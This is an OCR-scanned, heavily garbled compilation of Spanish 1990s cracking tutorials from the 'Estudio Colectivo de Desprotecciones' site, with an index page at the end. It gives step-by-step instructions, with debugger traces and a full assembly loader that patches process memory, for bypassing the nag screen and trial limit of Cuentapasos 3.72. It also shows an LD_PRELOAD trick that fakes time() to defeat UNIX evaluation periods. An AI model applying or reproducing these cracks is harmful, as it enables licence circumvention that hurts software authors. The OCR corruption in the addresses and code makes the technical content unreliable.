Addr:0FOE79A1 Ord: 502 (01F6h) Name: _adj_fdivr_m161 
Addr:0F0E7909 Ord: 503 (01F7h) Name: _adj_fdivr_m32 
Addr:0F0E79D5 Ord: 504 (01F8h) Name: _adj_fdivr_m321 
Addr:0F0E7955 Ord: 505 (01F9h) Name: _adj_fdivr_m64 
Addr:0FO0OE7F91 Ord: 506 (01FAh) Name: _adj_fpatan 
Addr:0F0E7C24 Ord: 507 (01FBh) Name: _adj_fprem 
Addr:OFOE7EDC Ord: 508 (01FCh) Name: _adj_fpreml 
Addr:0F0OE7F94 Ord: 509 (01FDh) Name: _adj_fptan 
Addr:0FOEA763 Ord: 510 (01FEh) Name: _allmul 
Addr:0F00B87E Ord: 512 (0200h) Name: rtcLeftBstr 
Addr:0FOOB8SFD Ord: 513 (0201h) Name: rtcLeftVar 
Addr:0F012425 Ord: 514 (0202h) Name: rtcRightBstr 
Addr:0F0123C4 Ord: 515 (0203h) Name: rtcRightVar 
Addr:0F03C89B Ord: 516 (0204h) Name: rtcAnsiValueBstr 
Addr:0F03A4D7 Ord: 517 (0205h) Name: rtcLowerCaseBstr 
Addr:0F03A479 Ord: 518 (0206h) Name: rtecLowerCaseVar 
Addr:0F0122F0 Ord: 519 (0207h) Name: rtcTrimBstr 
Addr:0FODF23C Ord: 520 (0208h) Name: rtcTrimVar 
Addr:0FODF2B5 Ord: 521 (0209h) Name: rtcLeftTrimBstr 
Addr:0FODF2DA Ord: 522 (020Ah) Name: rtcLeftTrimVar 
Addr:0OFODF4BC Ord: 523 (020Bh) Name: rtcRightTrimBstr 
Addr:0FODF4E1 Ord: 524 (020Ch) Name: rtcRightTrimVar 
Addr:0FODF81E Ord: 525 (020Dh) Name: rtcSpaceBstr 
Addr:0FODF860 Ord: 526 (020Eh) Name: rteSpaceVar 
Addr:0FODF88E Ord: 527 (020Fh) Name: rtcUpperCaseBstr 
Addr:0FODF8B3 Ord: 528 (0210h) Name: rtcUpperCaseVar 
Addr:0F01272A Ord: 529 (0211h) Name: rtcKillFiles 


Addr:0FOD5C7F Ord: 530 (0212h) Name: rtcChangeDir 
Addr:0FOD5CA2 Ord: 531 (0213h) Name: rtcMakeDir 
Addr:0FOD5CB3 Ord: 532 (0214h) Name: rtcRemoveDir 
Addr:0F0D6033 Ord: 533 (0215h) Name: rtcChangeDrive 
Addr:0FOD3A18 Ord: 534 (0216h) Name: rtcBeep 
Addr:0F022D75 Ord: 535 (0217h) Name: rtcGetTimer 
Addr:0F050519 Ord: 536 (0218h) Name: rteStrFromVar 
Addr:0F01BCE6 Ord: 537 (0219h) Name: rtcBstrFromAnsi 
Addr:0F0D6626 Ord: 538 (021Ah) Name: rtcPackDate 
Addr:0FOD668A Ord: 539 (021Bh) Name: rtcPackTime 
Addr:0FOD66F4 Ord: 540 (021Ch) Name: rtcGetDateV alue 
Addr:0F0D676C Ord: 541 (021Dh) Name: rtcGetTimeV alue 
Addr:0FO0D686F Ord: 542 (021Eh) Name: rtcGetDayOfMonth 
Addr:0F0D6931 Ord: 543 (021Fh) Name: rteGetHourOfDay 
Addr:0F0D6978 Ord: 544 (0220h) Name: rteGetMinuteOfHour 
Addr:0F0D6828 Ord: 543 (0221h) Name: rteGetMonthOf Year 
Addr:0FO1B4AC Ord: 546 (0222h) Name: rtcGetPresentDate 
Addr:0FOD69BF Ord: 547 (0223h) Name: rteGetSecondOfMinute 
Addr:OFOD6A8A Ord: 548 (0224h) Name: rtcSetDate Var 
Addr:0FOD6AD7 Ord: 549 (0225h) Name: rtcSetDateBstr 
Addr:0FOD6CDS3 Ord: 550 (0226h) Name: rtcSetTimeVar 
Addr:0F0D6D30 Ord: 551 (0227h) Name: rtcSetTimeBstr 
Addr:0FO0D68B6 Ord: 552 (0228h) Name: rteGetDayOf Week 
Addr:0FOD67E1 Ord: 553 (0229h) Name: rtcGetYear 
Addr:0F0D7D20 Ord: 554 (022Ah) Name: rtcFileReset 
Addr:0FOD7DBD Ord: 555 (022Bh) Name: rtcFileAttributes 
Addr:0FOSE65B Ord: 556 (022Ch) Name: rtcIsArray 
Addr:0F0D3A44 Ord: 557 (022Dh) Name: rtcIsDate 
Addr:0F0D3B2C Ord: 558 (022Eh) Name: rtcIsEmpty 
Addr:0F0D3B43 Ord: 559 (022Fh) Name: rtcIsError 
Addr:0FOD3BS5E Ord: 560 (0230h) Name: rtcIsNull 
Addr:0F0D3B77 Ord: 561 (0231h) Name: rtcIsNumeric 
Addr:0FOD3CA9 Ord: 562 (0232h) Name: rtcIsObject 
Addr:0F0506E7 Ord: 563 (0233h) Name: rtcVarType 
Addr:0F0D8118 Ord: 564 (0234h) Name: rtDecFromVar 
Addr:0F0D7D4A Ord: 565 (0235h) Name: rtcFile Width 
Addr:0OFODCF9D Ord: 566 (0236h) Name: rteInputCount 
Addr:0OFODCF6EC Ord: 567 (0237h) Name: rtcInputCountVar 
Addr:0FODEO534 Ord: 568 (0238h) Name: rtcFileSeek 
Addr:0FODE19D Ord: 569 (0239h) Name: rtcFileLocation 
Addr:0F0DE230 Ord: 570 (023Ah) Name: rtcFileLength 
Addr:0F0D7E39 Ord: 571 (023Bh) Name: rtcEndOfFile 
Addr:0F05D268 Ord: 572 (023Ch) Name: rtcHexBstrFromVar 
Addr:0F05D22E Ord: 573 (023Dh) Name: rtcHexVarFromVar 
Addr:0FOD8D4B Ord: 574 (023Eh) Name: rtcOctBstrFromVar 


Addr:0FOD8E54 Ord: 575 (023Fh) Name: rtcOctV arFromVar 
Addr:0F054278 Ord: 576 (0240h) Name: rtcFileCopy 
Addr:OFOD5D5F Ord: 577 (0241h) Name: rtcFileDateTime 
Addr:0F036192 Ord: 578 (0242h) Name: rtcFileLen 
Addr:0FOD5E2D Ord: 579 (0243h) Name: rtcGetFileAttr 
Addr:0FOD5E62 Ord: 580 (0244h) Name: rtcSetFileAttr 
Addr:0FODD1FE Ord: 581 (0245h) Name: rtcR8ValFromBstr 
Addr:0F0D3CC3 Ord: 582 (0246h) Name: rtcSin 
Addr:0FOD3CEC Ord: 583 (0247h) Name: rtcCos 
Addr:0FO0D3D15 Ord: 584 (0248h) Name: rtcTan 
Addr:0F0OD3D45 Ord: 583 (0249h) Name: rtcAtn 
Addr:0F01F4E3 Ord: 586 (024Ah) Name: rtcExp 
Addr:0FO1FOFC Ord: 587 (024Bh) Name: rtcLog 
Addr:0F01F42A Ord: 588 (024Ch) Name: rtcRgb 
Addr:0FOS50A8D Ord: 589 (024Dh) Name: rtcQBColor 
Addr:0F0OD7F70 Ord: 590 (024Eh) Name: rtecMacId 
Addr:0F060COA Ord: 591 (024Fh) Name: rte TypeName 
Addr:0F05BD16 Ord: 592 (0250h) Name: rtcIsMissing 
Addr:0F004A95 Ord: 593 (0251h) Name: rteRandomNext 
Addr:0F03AE08 Ord: 594 (0252h) Name: rtcRandomize 
Addr:0FOD405A Ord: 595 (0253h) Name: rteMsgBox 
Addr:0F0D4253 Ord: 596 (0254h) Name: rtelnputBox 
Addr:0F0D3D95 Ord: 597 (0255h) Name: rtcAppActivate 
Addr:0F0261B4 Ord: 598 (0256h) Name: rtcDoEvents 
Addr:0F0475F8 Ord: 599 (0257h) Name: rteSendKeys 
Addr:0FODOA69 Ord: 600 (0258h) Name: rtcShell 
Addr:0F1099BA Ord: 601 (0259h) Name: rtcArray 
Addr:0FOD3A21 Ord: 603 (025Dh) Name: rtcGetErl 
Addr:0F04EC33 Ord: 606 (025Eh) Name: rtcStringBstr 
Addr:0F04EBF6 Ord: 607 (025Fh) Name: rtcStringVar 
Addr:0F01BD44 Ord: 608 (0260h) Name: rtc VarBstrFromAnsi 
Addr:0F0D7009 Ord: 609 (0261h) Name: rtcGetDateBstr 
Addr:0F01B62E Ord: 610 (0262h) Name: rtcGetDate Var 
Addr:0FOD70CD Ord: 611 (0263h) Name: rtcGetTimeBstr 
Addr:0FOD6FB8 Ord: 612 (0264h) Name: rtcGetTimeVar 
Addr:0F058DD8 Ord: 613 (0265h) Name: rte VarStrFromVar 
Addr:0F0D3D50 Ord: 614 (0266h) Name: rtcSqr 
Addr:0F0D4678 Ord: 615 (0267h) Name: rtcIMEStatus 
Addr:0F012378 Ord: 616 (0268h) Name: rtcLeftCharBstr 
Addr:0F00B8C4 Ord: 617 (0269h) Name: rtcLeftCharV ar 
Addr:0FODED66 Ord: 618 (026Ah) Name: rtcRightCharBstr 
Addr:0F01238B Ord: 619 (026Bh) Name: rtcRightCharVar 
Addr:0FODDOA7 Ord: 620 (026Ch) Name: rteInputCharCount 
Addr:0F0DDO76 Ord: 621 (026Dh) Name: rteInputCharCountVar 
Addr:OFOEOA2C Ord: 622 (026Eh) Name: rtcStrConvVar 


Addr:0FODO9C7 Ord: 624 (0270h) Name: rteGetHostLCID 
Addr:0F0O3AB67 Ord: 625 (0271h) Name: rtcCreateObject 
Addr:0F0D2A4B Ord: 626 (0272h) Name: rteGetObject 
Addr:0FOESE4E Ord: 627 (0273h) Name: rtcAppleScript 
Addr:OFOOBCES Ord: 628 (0274h) Name: rtecMidBstr 
Addr:0FODED79 Ord: 629 (0275h) Name: rteMidVar 
Addr:0FODEEBS Ord: 630 (0276h) Name: rtcInStr 
Addr:OFOOBCBO Ord: 631 (0277h) Name: rtecMidCharBstr 
Addr:0F04306E Ord: 632 (0278h) Name: rteMidCharVar 
Addr:0FODEE39 Ord: 633 (0279h) Name: rtcInStrChar 
Addr:0F0D8592 Ord: 634 (027Ah) Name: rtBstrFromErrVar 
Addr:OFODSABF Ord: 635 (027Bh) Name: rtBoolFromErrVar 
Addr:0FOD83AA Ord: 636 (027Ch) Name: rtCyFromErrVar 
Addr:0FOD816C Ord: 637 (027Dh) Name: rtl2FromErrVar 
Addr:0F0OD81F3 Ord: 638 (027Eh) Name: rtl4FromErrVar 
Addr:0FOD826F Ord: 639 (027Fh) Name: rtR4FromErrVar 
Addr:0FOD82FE5 Ord: 640 (0280h) Name: rtR8FromErrVar 
Addr:0F0D8A73 Ord: 641 (0281h) Name: rtcDateFromVar 
Addr:0FOD86E2 Ord: 642 (0282h) Name: rtcVarFromVar 
Addr:0F0D8722 Ord: 643 (0283h) Name: rte CVErrFromVar 
Addr:0FOD4AC3 Ord: 644 (0284h) Name: VarPtr 
Addr:0F040CDA Ord: 645 (0285h) Name: rtcDir 
Addr:OFOD5ADS8 Ord: 646 (0286h) Name: rtcCurrentDirBstr 
Addr:0FOD5A29 Ord: 647 (0287h) Name: rtcCurrentDir 
Addr:0F00369C Ord: 648 (0288h) Name: rtcFreeFile 
Addr:O0FODESAS Ord: 649 (0289h) Name: rtcCompareBstr 
Addr:0F019070 Ord: 650 (028Ah) Name: rtcBstrFromFormatV ar 
Addr:0F0497D53 Ord: 651 (028Bh) Name: rtcBstrFromError 
Addr:0F0497A7 Ord: 652 (028Ch) Name: rtc VarFromError 
Addr:0FODEDO2 Ord: 653 (028Dh) Name: rtcLenCharVar 
Addr:0FODED2B Ord: 654 (028Eh) Name: rtcLenVar 
Addr:0F0D8766 Ord: 655 (028Fh) Name: rtcFixVar 
Addr:0F0D87CD Ord: 656 (0290h) Name: rtcAbsVar 
Addr:0F0D8834 Ord: 657 (0291h) Name: rtcIntVar 
Addr:0F0D889B Ord: 658 (0292h) Name: rtecSgnVar 
Addr:0F0DCO025 Ord: 660 (0294h) Name: rtc VarFromFormatV ar 
Addr:0F0OD72CB Ord: 661 (0295h) Name: rtcDateAdd 
Addr:0FOD75AD Ord: 662 (0296h) Name: rtcDateDiff 
Addr:0FOD78EA Ord: 663 (0297h) Name: rtcDatePart 
Addr:0F0D4693 Ord: 664 (0298h) Name: rtcPartition 
Addr:0F0D4991 Ord: 6653 (0299h) Name: rtcChoose 
Addr:0F04285D Ord: 666 (029Ah) Name: rtcEnvironVar 
Addr:0F04288B Ord: 667 (029Bh) Name: rtcEnvironBstr 
Addr:0FOD4A4C Ord: 668 (029Ch) Name: rtcSwitch 
Addr:0F012135 Ord: 669 (029Dh) Name: rte CommandBstr 


Addr:0F01218E Ord: 670 (029Eh) Name: rte CommandVar 
Addr:0FOE8E55 Ord: 671 (029Fh) Name: rteSLN 
Addr:OFOESE7A Ord: 672 (02A0h) Name: rteS YD 
Addr:0FOE8ECB Ord: 673 (02A 1h) Name: rteDDB 
Addr:0FOE901B Ord: 674 (02A2h) Name: rtcIPMT 
Addr:0F0E9107 Ord: 675 (02A3h) Name: rtePPMT 
Addr:0FOE91A5 Ord: 676 (02A4h) Name: rtecPMT 
Addr:0F0E9275 Ord: 677 (02A5h) Name: rtcPV 
Addr:0F0E9325 Ord: 678 (02A6h) Name: rtcFV 
Addr:0F0E93DC Ord: 679 (02A7h) Name: rtcNPer 
Addr:0F0E9514 Ord: 680 (02A8h) Name: rtcRate 
Addr:0F01B43E Ord: 681 (02A9h) Name: rtcImmediatelf 
Addr:0F0E9732 Ord: 682 (02AAh) Name: rtcIRR 
Addr:O0FOE9A66 Ord: 683 (02ABh) Name: rte MIRR 
Addr:OFOE9BEE Ord: 684 (02ACh) Name: rteNPV 
Addr:0F00D607 Ord: 685 (02ADh) Name: rtcErrObj 
Addr:0F0D8B28 Ord: 686 (02AEHh) Name: rtUll FromErrVar 
Addr:0FOD8SA7F Ord: 687 (02AFh) Name: rte VarDateFromVar 
Addr:0FOE9DFEB Ord: 689 (02B 1h) Name: rtcGetSetting 
Addr:0FOE9FCS Ord: 690 (02B2h) Name: rtcSaveSetting 
Addr:OFOEAOB6 Ord: 691 (02B3h) Name: rtcDeleteSetting 
Addr:0FOEA4A7 Ord: 692 (02B4h) Name: rteGetAllSettings 
Addr:OFODEDFS Ord: 693 (02B5h) Name: rtcByteValueBstr 
Addr:0FOD8BAD Ord: 694 (02B6h) Name: rtcBstrFromByte 
Addr:0FOD8BCE Ord: 695 (02B7h) Name: rtcVarBstrFromByte 
Addr:0FODEE14 Ord: 696 (02B8h) Name: rtcCharValueBstr 
Addr:0FOD8BFC Ord: 697 (02B9h) Name: rtcBstrFromChar 
Addr:0F0D8C43 Ord: 698 (02B Ah) Name: rte VarBstrFromChar 
Addr:0FOD7CF9 Ord: 699 (02BBh) Name: rtcSetCurrentCalendar 
Addr:0F01B38D Ord: 700 (02BCh) Name: rtcGetCurrentCalendar 
Addr:0F0D25C9 Ord: 999 (03E7h) Name: TipInvokeMethod2 
Addr:0FOD26F0 Ord:1016 (03F8h) Name: TipInvokeMethod 
Addr:0FOECSAO Ord: 1024 (0400h) Name: ¡ID_IVbaHost 
Addr:0F0170E9 Ord:1025 (0401h) Name: EbGetObjConnectionCounts 
Addr:0FOS5A1D9 Ord:2000 (07D0h) Name: CreatelExprSrvObj 
Addr:0F0D1387 Ord:2010 (07DAh) Name: EbGetVBAObject 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


progrAmA Cuentapasos 3.72 W95 


El programa cuentapasos es una utilidad para controlar 
DEsCripCión el gasto telefonico, con los ultimos planes (los bononets) 
que telefonica a puesto. 


Como comentario, no voy a hacerlo estilo Carrascal, sino decir 
que este crack funciona para el cuentapasos 3.72 con las siguientes 
caracteristicas: 


Fichero: cpasos32.exe 
Tamaño: 531.611 bytes 


ComEntArio Fecha: 30/3/99 


Digo esto, porque me han informado que el autor ha modificado 
el ejecutable haciendolo mas pequeño, pero todavia no me lo he 
bajado para comprobarlo. ;) 


Introducción 


Lo primero de todo, mandar unos saludetes a todOs los colegas de la scene 
del 
cracking hispano, ya que segun veo parece que estamos remontando el vuelo, a ver 
si algun dia llegamos a hacer una pagina semejante a la de +fravia. 


Bueno, he escogido este programa porque es bastante popular al menos que yo 
sepa en españa, y al parecer no habia un crack para el y decidi intentar remediarlo. 


> 
Vi 


Al Atake 


Veamos, despues de instalar el programa, al ejecutarlo vemos que nos sale una 
nagscreen avisandonos que no estamos registrados y que tenemos un periodo tipico 
de prueba de 30 dias. 


Al ser un programa hecho en Visual Basic, nos aseguramos que en el fichero 
winice.dat del softice este la linea: 


EXP=CXAWINDOWSIS YSTEMIMSVBVM50.DLL 


Hechas ya las presentaciones, vamos a intentar abordarlo con los siguientes 
breakpoints que a mi entender son bastantes utiles a la hora de crackear programas 
hechos en Visual Basic, que son lo siguientes: 


rícDoEvents 
rtcMsgBox 

_ vbaNew 

_ vbaNew2 
rtcInputBox 
rtcGetTimer 
rtcUpperCaseVar 
rtcUpperCaseBstr 


Pues bien, el primer paso que tenemos que dar es buscar donde el programa 
toma la eleccion de seguir cuando nosotros pulsamos aceptar o salir cuando 
pulsamos el boton correspondiente; de esta lista probamos en esta ocasion con 
rtcDoEvents, asi que nos vamos 
al softice ponemos bpx rtcdoevents, y pulsamos Ctrl-D con lo que volvemos a la 
nagscreen y pulsamos aceptar; inmediatamente despues volvemos al softice y 
pulsamos una vez F12 con lo que nos situamos en las siguientes lineas: 


Pulsamos F10 


0137:00474963 call [MSVBVMS5O0O!rtcDoEvents] 
0137:00474969 mov dword ptr [ebp-04],00000051 
0137:00474970 lea ecx,[ebp-64] 


0137:00474973 push ecx 
0137:00474974 call [MSVBVMS50!rtcGetPresentDate] 
0137:0047497A lea edx,[ebp-64] 


Vamos pulsando F10 


0137:004749B2 push edx 

0137:004749B3 push 02 

0137:004749B5 call [MSVBVM50!rtc__vbaFreeVarList] 
0137:004749BB add esp,0C 

0137:004749BE movsx eax, word ptr [ebp-00D4] 


0137:004749C5 test eax,eax ---> si eax=0 sale, no sigue y termina el 
programa. 
0137:004749C7 jz004761B3  ---> sieax=-1 entonces sigue 


0137:004749CD mov dword ptr [ebp-04],00000052 

0137:004749D4 cmp dword ptr [0054F200],00 

0137:004749DB ¿nz 4749F9 ---> Si eres un chico bueno sigue para adelante 
en caso contrario si eres un chico malo 
se acabo tu andadura. 


Bueno, bueno, bueno, segun parece hemos encontrado el lugar donde despues 
de pulsar sobre uno de los dos botones de la nagscreen el programa hace una cosa u 
otra dependiendo de si aceptas o deseas salir. Luego ya tenemos la direccion donde 
despues de multiples calculos de conversiones de tipos de datos tipicos del Visual 
Basic, esquema de proteccion del autor (de la cual se podria hablar en otro tutorial), 
etc, etc, etc, se dirige el programa. Luego recapitulemos, ya sabemos donde tiene 
que saltar para proseguir el programa, ahora nos hace falta saber desde donde lo 
podemos llamar. ¿Que se os ocurre? 
a mi personalmente despues de ver lo bien que ha funcionado el breakpoint del 
rtcDoEvents, 
voto por volverlo a usar pero ahora antes de que salga la nagscreen. 


Empezamos otra vez, ponemos el breakpoint del rtcDoEvents, y vamos 
pulsando Ctrl-D hasta uno antes de que salga la famosa nagsreen (tenemos que 
pulsar 4 veces Ctrl-D) 
con lo que nos encontramos con lo siguiente: 


* Vamos pulsando Fl0 * 


0137:00477D06 call [MSVBVM50!rtcDoEvents] 
0137:00477D0C wait 

0137:00477DO0D push 00477D66 
0137:00477D12 ¡mp 00477D5C 


0137:00477D5C lea ecx,[ebp-24] 
0137:00477D5F call [MSVBVMS50!__ vbaFreeStr] 


0137:00477D65 
0137:00477D66 
0137:00477D69 
0137:00477D70 
0137:00477D71 
0137:00477D72 
0137:00477D73 
0137:00477D75 
0137:00477D76 


0137:004741D6 
0137:004741 


0137:004741E2 
0137:004741E9 


ret 

mov ecx,[ebp-20] 

mov fs:[00000000],ecx 
pop edi 

pop esi 

pop ebx 

mov esp,ebp 

pop ebp 

ret 0004 


call 00476F50  ---> Todo el meollo de la proteccion 

mov dword ptr [ebp-04],0000003F ---> regresa aqui despues 
del anterior ret 0004 

cmp dword ptr [0054B7AC],00 

jnz 00474207 


Pues bien, a partir del JNZ 00474207 empieza a decir que no estamos 
registrados, que si es un version de evaluacion, .... Luego si en vez de que ese CALL 
00476E50 llame todas las comprobraciones que lleva a cabo ponemos la direccion 
que obtuvimos antes donde proseguia el programa, VOILA ;). 


Cambiamos el call 00476F50 por call 004749F9. Pero Houston, Houston, 
tenemos un problema, el parche no podemos aplicarlo con un editor hexadecimal 
(bendito Visual Basic), pues bien aqui tenemos dos opciones: 


- Usar el Proccess Patcher v2.4 de thewd 
- Usar el Tasm 5.0 


Si usas el Tasm 5.0: 


; Basado en el loader.exe original de Hayras [tNO '98] 


; Tienes que usar Tasm 5.0 8 import32.lib para compilarlo 


; tasm32 /ml crack.asm 
; tlink32 /Tpe /aa /ccrack,, <path to> import32.lib 
; reemplaza <path to> donde este la libreria import32.lib 


.386P 
Locals 
jumps 


.Model Flat ,StdCall 


¡Definimos las funciones externas y constantes que necesitamos. 


Extrn  MessageBoxA:PROC 
Extrn  WaitForInputldle:PROC 


Extrn  WriteProcessMemory:PROC 
Extrn  ReadProcessMemory:PROC 
Extrn CreateProcessA:PROC 
Extrn CloseHandle:PROC 

Extrn ExitProcess:PROC 


.Data 

CSiR_Tag db 'Lector PE £ CRACKER Por esiel2 -1999-'0 
CSiR_Error db 'Error!!!',0 

CSiR_Errorl db 'Algo se jodio...',0 

OpenERR_txt db 'Error con el CreateProcess :(',0 
ReadERR_txt db 'Error con el ReadProcessMemory :(,0 
WriteERR_txt db 'Error con el WriteProcessMemortry :P",0 
VersionERR_txt db 'No es la version 3.72 del cuentapasos :(*,0 
CSiR_ProcessInfo dd 4 dup (0) 

CSiR_StartupInfo db 48h dup (0) 

CSiR_RPBuffer db 10h dup (0) 


CSiR_AppName db 'cpasos32.EXE',0 
fuck dd 004741d6h 
sizeof dd 5 


checkbytes db 0e8h,075h,02dh,0,0 


patch_data_1 db Oe8h,01eh,08h,0,0 
patch_size_1 dd 5 
patch_addr_1 dd 004741d6h 


.Code 

Main: 
push offset CSIR_Tag 
mov  dword ptr [CSiR_StartupInfo],44h 
push offset CSiR_ProcessInfo 
push offset CSiR_StartupInfo 
push 0 
push 0 
push 20h 
push 0 
push 0 
push 0 
push 0 
push offset CSIR_AppName 
call CreateProcessA 


test  eax,eax 
jz  OpenERR 


Wait4Depack: 
push LARGE-1 
push  dword ptr [CSiR_ProcessInfo] 
call WaitForInputldle 


Check_Data: 


push 0 

push  dword ptr [sizeof] 

push offset CSiIR_RPBuffer 

push  dword ptr [fuck] 

push  dword ptr [CSiR_ProcessInfo] 
call ReadProcessMemory 

test  eax,eax 


jz  ReadERR 
¡int 03 ;-) 
cld 


lea  esi, CSiIR_RPBuffer 
lea edi, checkbytes 
mov  ecx,5 

rep cmpsb 

jnz VersionERR 


Patch_the_mother: 
push 0 
push  dword ptr [patch_size_1] 
push offset patch_data_1 
push  dword ptr [patch_addr_1] 
push  dword ptr [CSiR_ProcessInfo] 
call WriteProcessMemory 
test  eax,eax 
jz WriteERR 


Close_This_app: 
push  dword ptr [CSiR_ProcessInfo] 
call CloseHandle 
push  dword ptr [CSiR_ProcessInfo+4] 
call CloseHandle 


Exit_Proc: 
Push LARGE-1 
Call ExitProcess 


VersionERR: 
lea  eax, VersionERR_txt 
jmp  abort 

ReadERR: 
lea  eax, ReadERR_txt 


jmp  abort 
OpenERR: 
lea  eax, OpenERR_txt 
jmp  abort 
WriteERR: 
lea  eax, WriteERR_txt 
abort: 
push 0 
push offset CSIR_Error 
push eax 
push 0 
call MessageBoxA 


jmp Close_This_app 


End Main 


Se acabo por esta vez, espero que me haya explicado bien, hasta otra.... 


wen 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


E - 
Whiskey Kon Tekila 


. 
Whiskey Kon Tekila 


progrAmA Programas de evaluación en UNIX UNIX 


po Sharewares, Demos 

| protECCión Limitaciones en el tiempo de uso. 

[— DiFICUltAD 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
hErrAmiEntAs Una Librería dinámica propia : Mi_Time 

| CrACkEr [Bart 

[FECHA |24de Octubre de 1998 


Introducción 


La verdad es que no trabajo en Windows mucho, mi campo en mas bien el Linux, 
en este caso tengo un truquillo que puede serviros, para saltarse la proteccion de la 
copias de programas de evaluacion. 


Consiste en hacer creer al programa que esta viviendo en un tiempo distinto, 
gracias a las librerias dinamicas y a la variable de entorno LD_PRELOAD 
No se si esto es extensible de algun modo a las DLL de Windoze. 


CREO QUE ES VALIDO PARA TODO SISTEMA UNIX, NO FUNCIONA CON 
PROGRAMAS CON EL BIT DE SUID ACTIVADO, PUES ELLOS NO 
ACCEPTAN EL LD_PRELOAD. 


Al Atake 


MODO DE EMPLEO: 


Quitar la proteccion al programa "EXE" que tien 


evaluacion 


1) creo funciones de tiempo 


en un momento en el qu 
licencia de 30 dias o lo 


cuenta d 


en una libreria y que tiene tiempo fijado 
1] programa de evalucion funciona con 
que sea. 


2) uso el programa "strace" y "grep" 
Sstrace EXE 2> zz; grep "time(NULL)" zz;¿rm zz 
time (NULL) = 908959851 
3) aparece un numero: N_time crack = 908959851 
time returns the time since the Epoch (00:00:00 UTC, Jan- 
uary 1, 1970), measured in seconds. 
4) Mi libreria dinamica: 
mi_time.so.1.0 
Se carga antes que la del sistema: 


S$mv EXE EXE.orig 


asi el fichero EXE es un script ahora 


(parecido a un .bat del MSDOS) 


export LD_PRELOAD=/1ib/libmi_time.so.1.0 


EXE.orig 

5) Incluyo todo en un atachment (_Mi Time ) 

Un saludo a todos los ECD-mailers. 
| ESVAVAVAVAVA | 
| | | N | 
| | | [Elvis ds |] 
| Lo o_—_ | |. dead! |] 
| O | 
| ex iló!] Tal Zo] bart. | | 
| | mn. ou | AN y | 
| | | 1/ | 
| NU 1/ 1 | 
| IZA | 
| 7] PAN | 
| | 
Linux: The choice of a GNU generation 


"My opinions are my own, 


and I've get *lots* of them!" 


KAKXKKXKKKKKKKKK KK KK KKKKKKKKKKKK KK KK KK KK KK KKKKKKAK 


W98 supports real multitasking - it can boot and crash simultaneously 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Programa Xxx | W95 / W98 / NT 
A AA 
MA a e ias 

Url http://www 
[Protección  |NagSereen. Time Limit 30 Dias 
[Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas  [Softlce v3.25, W32dasm v8.9, UltraEdit v6.10a 
Objetivo [Simular estar registrados. 
O 


Lu 
Introducción 

wr 
Al Atake 
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Última Actualizacion: 01/11/99 


ECD MIRRORS: 


Esta es la lista de páginas oficiales para consultar el ECD: 


m Crackz Web Site 


= http://ecd.tsx.org 
= http://w56.org/ecd 


Esta última url http://w56.org/ecd es un desvio aleatorio a cualquiera 


de los mirrors. 
Por lo que os recomendamos que lo utiliceis si quereis ponernos un 


link en vuestra web. 


ULTIMAS NOVEDADES: 


Saludos a todos! Parece que por fin la Cracking-Scene-Hispana 
comienza a dar muestras de una gran actividad. Son muchos y muy 
buenos los artículos que he recibido en estas dos últimas semanas : 


. Cuentapasos v3.75 

. Registry Studio V1.01 
Code Snippet Creator v1.05: Archivos PE 
La Memoria en W32: Intro 
. Reversing with ToPo v1.0 

. Lake Clear Animato v1.0c 

. Productos RKS Software 

. Winboost 2000 v1.0.0.1999 
. Kyodai v10.21 

. Quick Heal v5.20 

. Ultraedit v6.20b 

. WinGest v3.5 

. Toggle Mouse v3.4.3 

. WkT! Faq Oficial página 1 
. WkT! Faq Oficial página 2 
. WkT! Faq Oficial página 3 


Roa a a a pa pa 


Una visita obligada es la sección de Documentos Genéricos donde 


encontrarás la última revisión de la WkT! Faq Oficial, un artículo muy 
completo sobre el formato de los archivos PE, un artículo sobre la 
Memoria en W32 y un tutorial sobre cómo utilizar Topo v1.0, además 
de otros documentos igualmente interesantes. 


AGRADECIMIENTOS: 


WKkT! agradece a todos sus colaboradores su ayuda con el proyecto 
ECD, y su inestimable apoyo moral. Muchas gracias a todos los que 
visitals nuestros forums sobre Ingenieria Inversa y nos abrasais a 
preguntas. 

Gracias a TNT! y KuT! por sumarse al proyecto ECD con sus ensayos 
de Ingenieria Inversa. Thanks to Crackz for his mirror. 


COLABORA CON EL PROYECTO ECD: 


La versión Inglesa del ECD se encuentra en fase de preparación. 
NECESITAMOS TRADUCCIONES !! 

Si se te da bien el Ingles y te gustaria colaborar en el proyecto ECD, 
por favor, traduce alguno de estos tutoriales al Ingles y envia la 
traducción a wktObigfoot.com 


(conserva el formato original, gracias) 


¡OJO : Cuestiones legales a tener en cuenta. | 


ESTUDIO COLECTIVO DE DESPROTECCIONES: 


Este site nace con el objetivo de recopilar tutoriales en castellano sobre 
el noble arte del cracking, para de esta manera favorecer el aprendizaje 
de las técnicas de debugging, imprescindibles para defendernos de los 
bugs (mayormente intencionados, o sea protecciones) que los 
fabricantes de software introducen en sus programas, que no lo 
olvidemos, residen en nuestro disco duro, por lo cual deberíamos ser 
libres de poderlos modificar a nuestro antojo. 

(Uf, vaya frase...;-) 


NOTA PARA EL PROGRAMADOR INDIGNADO QUE ESTA LEYENDO 
ESTAS PAGINAS 


Si eres de los que piensan que los crackers estamos de mas, que lo 
unico que hacemos es perjudicar a las casas de soft, que te estamos 
robando dinero......... bien, quiza lo verias todo de manera distinta desde 
"el otro lado". Si, has leido bien, te estamos invitando a que te 
introduzcas en el mundo de la Ingenieria Inversa. Te invitamos a leer 
tutoriales, a crackear tus propios programas y aprender como 
PROTEGERLOS MEJOR. 

¿Perplejo? pues no deberias estarlo, en lugar de quejarte de nuestro 
comportamiento y abrir la veda de la "caza al cracker", lo mejor que 
puedes hacer es aprender de tus errores y de los demás. Despues de 
todo, el "trabajo sucio” lo hemos hecho por ti. ;0) 

Aunque parezca extraño, WkT! está dedicado a formar a los 
programadores , mostrándoles sus defectos y el camino para producir 
software de calidad. 


Crackea Jacta Est 


Entendemos por tutoriales, la explicación de cómo se desprotege un 
determinado programa. 

Se puede acceder a todos ellos a través de las 3 páginas de índices, 
cada una de las cuales está ordenada de diferente manera : 


e Por Tipo de Protección : Cd-Checks, Mochilas, Limitaciones 
de tiempo, .... ) 

e Por Fecha de Publicación : Util para ir siguiendo las 
novedades publicadas. ) 

